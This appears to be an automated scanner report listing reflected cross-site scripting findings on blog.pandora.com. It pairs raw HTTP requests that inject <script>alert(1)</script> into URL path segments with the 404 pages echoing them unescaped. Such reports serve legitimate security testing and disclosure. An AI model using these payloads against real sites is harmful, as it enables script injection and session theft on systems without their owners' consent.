GET /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39608<script>alert(1)</script>520f9e495aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c6d<script>alert(1)</script>71c09bfa91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 133b4<script>alert(1)</script>487daa5efe0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33a6<script>alert(1)</script>2c3a3b69a5c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac326<script>alert(1)</script>370b7b6a4ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 90b22<script>alert(1)</script>4fb98f6e6f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 413a3<script>alert(1)</script>9a08076521d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d17eb<script>alert(1)</script>62f82312779 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c059<script>alert(1)</script>cbdd421d4ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3228<script>alert(1)</script>c5395df2fbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a573a<script>alert(1)</script>1397d442dff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86757<script>alert(1)</script>a841a197765 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0cd0<script>alert(1)</script>6fc6995917b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 590d0<script>alert(1)</script>cfaacaaf3db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b6bf<script>alert(1)</script>7c9340a2e6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5da7<script>alert(1)</script>d624e770f2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:21 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d9ba<script>alert(1)</script>060e4b9ef4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0798<script>alert(1)</script>ad8c655c453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f490a<script>alert(1)</script>57eed6c6746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ was not found on this server.</p> ...[SNIP]...
